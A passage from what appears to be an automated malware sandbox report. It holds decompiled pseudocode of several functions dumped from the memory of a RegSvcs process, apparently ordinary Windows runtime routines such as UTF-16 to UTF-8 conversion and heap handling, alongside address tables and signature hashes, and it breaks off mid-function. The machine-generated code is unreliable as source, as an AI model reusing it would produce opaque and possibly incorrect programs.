                                          Uniqueness Score: -1.00%

                                          Function 0130849B Relevance: .3, Instructions: 290COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0130849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x13cf9c0);
				E0134D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x13e7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0130CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01312280( *[fs:0x30], 0x13e8550);
						_t139 =  *0x13e7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0132F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0130FFB0(_t193, _t235, 0x13e8550);
								L5:
								return E0134D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E012F1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x13e7b9c; // 0x0
							_t235 = L01314620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x13e7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0132A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0130FFB0(_t193, _t235, 0x13e8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L013177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L013177F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x13e7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x13e7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E013337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x13e7b9c; // 0x0
									_t214 = L01314620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E013337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x13e7b10 =  *0x13e7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x13e7b04 =  *0x13e7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L013177F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L013177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x13e7b08 =  *0x13e7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E013357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0133F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L013177F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0132A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L013177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E013396C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                          0x0130849b
                                          0x0130849b
                                          0x0130849b
                                          0x0130849b
                                          0x0130849d
                                          0x013084a2
                                          0x013084a7
                                          0x013084b1
                                          0x013084d8
                                          0x00000000
                                          0x013084b3
                                          0x013084c4
                                          0x013084c9
                                          0x013084cd
                                          0x013084cf
                                          0x013084cf
                                          0x013084d6
                                          0x013084e6
                                          0x013084e9
                                          0x013084ec
                                          0x013084ef
                                          0x013084f2
                                          0x013084f4
                                          0x013084fc
                                          0x01308501
                                          0x01308506
                                          0x01308509
                                          0x013086e0
                                          0x013086e5
                                          0x013086e8
                                          0x013086ed
                                          0x013086f0
                                          0x013086f2
                                          0x01359afd
                                          0x01359b02
                                          0x013084da
                                          0x013084df
                                          0x013084df
                                          0x013086fa
                                          0x013086fd
                                          0x013086fe
                                          0x01308701
                                          0x01308706
                                          0x01308709
                                          0x0130870b
                                          0x00000000
                                          0x00000000
                                          0x01308711
                                          0x01308725
                                          0x01308727
                                          0x0130872a
                                          0x0130872c
                                          0x01359af0
                                          0x01359af5
                                          0x01308732
                                          0x01308732
                                          0x01308732
                                          0x01308735
                                          0x01308737
                                          0x01308515
                                          0x01308515
                                          0x01308518
                                          0x0130851d
                                          0x01308523
                                          0x01308527
                                          0x0130852b
                                          0x01308537
                                          0x01308539
                                          0x0130853c
                                          0x0130853e
                                          0x0130868c
                                          0x01308691
                                          0x01308699
                                          0x0130869b
                                          0x01308744
                                          0x01308748
                                          0x013086a1
                                          0x013086a1
                                          0x013086a1
                                          0x013086a4
                                          0x013086a8
                                          0x01359bdf
                                          0x01359bdf
                                          0x013086ae
                                          0x013086b0
                                          0x00000000
                                          0x013086b6
                                          0x00000000
                                          0x01359be9
                                          0x013086b0
                                          0x01308544
                                          0x0130854a
                                          0x0130854d
                                          0x01308551
                                          0x0130876e
                                          0x01308778
                                          0x0130877b
                                          0x01308780
                                          0x01308557
                                          0x01308557
                                          0x0130855d
                                          0x0130855d
                                          0x0130856b
                                          0x0130856e
                                          0x01308570
                                          0x01308573
                                          0x01308576
                                          0x01308576
                                          0x01308579
                                          0x0130857b
                                          0x00000000
                                          0x00000000
                                          0x01308581
                                          0x013085a0
                                          0x013085a2
                                          0x013085a5
                                          0x013085a7
                                          0x01359b1b
                                          0x01359b1b
                                          0x0130862e
                                          0x0130862e
                                          0x01308631
                                          0x01308631
                                          0x01308634
                                          0x01308636
                                          0x01308669
                                          0x01308669
                                          0x0130866b
                                          0x01359bbf
                                          0x01359bc4
                                          0x01359bc8
                                          0x01359bce
                                          0x01359bce
                                          0x01308671
                                          0x01308671
                                          0x01308674
                                          0x01308676
                                          0x01359bae
                                          0x01359bae
                                          0x01308676
                                          0x0130867c
                                          0x0130867e
                                          0x01308688
                                          0x01308688
                                          0x00000000
                                          0x0130867e
                                          0x01308638
                                          0x01308638
                                          0x0130863b
                                          0x0130863e
                                          0x0130863f
                                          0x01308642
                                          0x01308645
                                          0x01308648
                                          0x0130864d
                                          0x01359b69
                                          0x01359b6e
                                          0x01359b7b
                                          0x01359b81
                                          0x01359b85
                                          0x01359b89
                                          0x01359ba7
                                          0x01359b8b
                                          0x01359b91
                                          0x01359b9a
                                          0x01359b9f
                                          0x01359b9f
                                          0x01308788
                                          0x0130878d
                                          0x01308763
                                          0x01308763
                                          0x01308766
                                          0x00000000
                                          0x01308766
                                          0x01359b70
                                          0x00000000
                                          0x01359b70
                                          0x01308656
                                          0x0130865a
                                          0x0130865c
                                          0x01308752
                                          0x01308756
                                          0x00000000
                                          0x00000000
                                          0x0130875e
                                          0x00000000
                                          0x0130875e
                                          0x01308662
                                          0x01308662
                                          0x01308662
                                          0x01308666
                                          0x00000000
                                          0x01308666
                                          0x013085b7
                                          0x013085b9
                                          0x013085bc
                                          0x013085bf
                                          0x013085cc
                                          0x013085d1
                                          0x013085d4
                                          0x013085db
                                          0x013085de
                                          0x013085e0
                                          0x01359b5f
                                          0x00000000
                                          0x01359b5f
                                          0x013085e6
                                          0x013085ea
                                          0x013086c3
                                          0x013086c5
                                          0x013086c8
                                          0x013086ca
                                          0x01359b16
                                          0x00000000
                                          0x01359b16
                                          0x013086d6
                                          0x013085f6
                                          0x013085f6
                                          0x013085f9
                                          0x01308602
                                          0x01308606
                                          0x0130860a
                                          0x0130860b
                                          0x0130860e
                                          0x01308611
                                          0x00000000
                                          0x01308611
                                          0x013085f3
                                          0x00000000
                                          0x013085f3
                                          0x01308619
                                          0x0130861e
                                          0x0130861e
                                          0x01308621
                                          0x01308622
                                          0x01308623
                                          0x01308625
                                          0x0130862c
                                          0x00000000
                                          0x0130873d
                                          0x00000000
                                          0x0130873d
                                          0x01308737
                                          0x0130850f
                                          0x01308512
                                          0x00000000
                                          0x01308512
                                          0x00000000
                                          0x013084d6

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b136f276147dca4052a4d5e0c6e8f6742ef9755f88afeb456b514120ae77f9eb
                                          • Instruction ID: aa0b76ace2cb6f37f0a3abc08e453df127451ac46140ca6cc5766e6c265517b9
                                          • Opcode Fuzzy Hash: b136f276147dca4052a4d5e0c6e8f6742ef9755f88afeb456b514120ae77f9eb
                                          • Instruction Fuzzy Hash: 3DB17B70E0030ADFDF26DFA8C990AADBBF9BF48708F144169E515AB785D770A841CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132EBB0 Relevance: .2, Instructions: 250COMMONLIBRARYCODECrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0132EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E0132ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                          0x0132ebb8
                                          0x0132ebbf
                                          0x0132ebc1
                                          0x0132ebc6
                                          0x00000000
                                          0x0136b6d6
                                          0x0132ebcd
                                          0x0132ebd2
                                          0x0132ec95
                                          0x0136b6e0
                                          0x0132ec9b
                                          0x0132eca1
                                          0x0132eca1
                                          0x0132ec89
                                          0x00000000
                                          0x0132ec89
                                          0x0132ebd8
                                          0x0132ebdd
                                          0x0136b6ea
                                          0x00000000
                                          0x0132ebe3
                                          0x0132ebe5
                                          0x0132ebe7
                                          0x0132ebef
                                          0x0132ebf2
                                          0x00000000
                                          0x0132ebf5
                                          0x00000000
                                          0x0132ebf5
                                          0x0132ebf5
                                          0x0132ebf7
                                          0x0136b6f6
                                          0x0132ec7c
                                          0x0132ec7c
                                          0x0132ec7f
                                          0x0132ec82
                                          0x0132ec87
                                          0x00000000
                                          0x0132ec87
                                          0x0132ec1a
                                          0x0132ec1a
                                          0x0132ec25
                                          0x0136b725
                                          0x0136b72c
                                          0x0136b72c
                                          0x0132ec2d
                                          0x0132ec31
                                          0x0136b73c
                                          0x0136b744
                                          0x0136b748
                                          0x0136b748
                                          0x0136b749
                                          0x0136b749
                                          0x0136b74a
                                          0x0136b74a
                                          0x0132ec3e
                                          0x0136b860
                                          0x00000000
                                          0x0132ec44
                                          0x0132ec47
                                          0x0136b750
                                          0x0136b758
                                          0x0136b767
                                          0x0136b775
                                          0x0136b77c
                                          0x0136b77f
                                          0x0136b769
                                          0x0136b76c
                                          0x0136b76c
                                          0x0136b781
                                          0x0136b788
                                          0x0136b78b
                                          0x0136b75a
                                          0x0136b75d
                                          0x0136b75d
                                          0x0136b78d
                                          0x0136b792
                                          0x0136b793
                                          0x0136b793
                                          0x0132ec54
                                          0x0132ec56
                                          0x0132ec57
                                          0x0132ec59
                                          0x0132ec5e
                                          0x0132ecaa
                                          0x0132ed16
                                          0x0132ed16
                                          0x0132ecac
                                          0x0132ecaf
                                          0x0132ecb4
                                          0x0132ecb6
                                          0x0132ecb6
                                          0x0132ecb9
                                          0x0132ecbf
                                          0x0136b7c1
                                          0x0136b7c8
                                          0x0136b7d3
                                          0x0136b7db
                                          0x0136b7ec
                                          0x0136b858
                                          0x00000000
                                          0x0136b858
                                          0x0136b7ee
                                          0x0136b7f1
                                          0x0136b7f4
                                          0x0136b7ff
                                          0x0136b850
                                          0x00000000
                                          0x0136b850
                                          0x0136b80a
                                          0x0136b813
                                          0x0136b81c
                                          0x0136b81d
                                          0x0136b822
                                          0x0136b825
                                          0x0136b828
                                          0x0136b831
                                          0x0136b832
                                          0x0136b837
                                          0x0136b840
                                          0x0136b842
                                          0x0136b845
                                          0x0136b848
                                          0x00000000
                                          0x0136b848
                                          0x0136b7df
                                          0x00000000
                                          0x0136b7df
                                          0x0136b7cc
                                          0x00000000
                                          0x0136b7cc
                                          0x0132ecc5
                                          0x0132ecc7
                                          0x0132eccb
                                          0x0136b79b
                                          0x0136b79e
                                          0x0136b7a4
                                          0x00000000
                                          0x00000000
                                          0x0136b7a6
                                          0x0136b7a8
                                          0x0136b7a8
                                          0x0132ecd3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132ecd5
                                          0x0132ecd5
                                          0x0132ecd5
                                          0x0132ecd8
                                          0x0132ecda
                                          0x0132ece4
                                          0x00000000
                                          0x00000000
                                          0x0132ecea
                                          0x0132eced
                                          0x0132ecf0
                                          0x0132ecf2
                                          0x0132ecfb
                                          0x0132ecfe
                                          0x0132ed01
                                          0x0132ed06
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132ed06
                                          0x0136b7ae
                                          0x0136b7b1
                                          0x0136b7b7
                                          0x00000000
                                          0x00000000
                                          0x0136b7b9
                                          0x0136b7bb
                                          0x0132ed08
                                          0x0132ed08
                                          0x0132ed0c
                                          0x0132ed0c
                                          0x00000000
                                          0x0132ec60
                                          0x0132ec62
                                          0x0132ed0f
                                          0x0132ed0f
                                          0x00000000
                                          0x0132ed0f
                                          0x0132ec68
                                          0x0132ec6c
                                          0x0132ec6f
                                          0x0132ec75
                                          0x0132ec0d
                                          0x0132ec0d
                                          0x0132ec18
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132ec18
                                          0x0132ec77
                                          0x0132ec79
                                          0x0132ec79
                                          0x00000000
                                          0x0132ec68
                                          0x0132ec5e
                                          0x0132ec3e
                                          0x0132ebfd
                                          0x0132ec02
                                          0x0136b701
                                          0x0136b70c
                                          0x0136b71b
                                          0x0136b71d
                                          0x0136b71d
                                          0x00000000
                                          0x0136b70c
                                          0x0132ec08
                                          0x0132ec0a
                                          0x00000000
                                          0x0132ec0a
                                          0x0132ebf5
                                          0x0132ebf5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                          • Instruction ID: 993a864ee0de7818f07d0ed5fdd29488080b1f0c941a83461c66724a76223f0b
                                          • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                          • Instruction Fuzzy Hash: 1E813B31A042798FEF255EACC4C227DFB58EF5231CB2C857AD942CB749C2259846DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131AB40 Relevance: .2, Instructions: 240COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E0131AB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E013BA80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
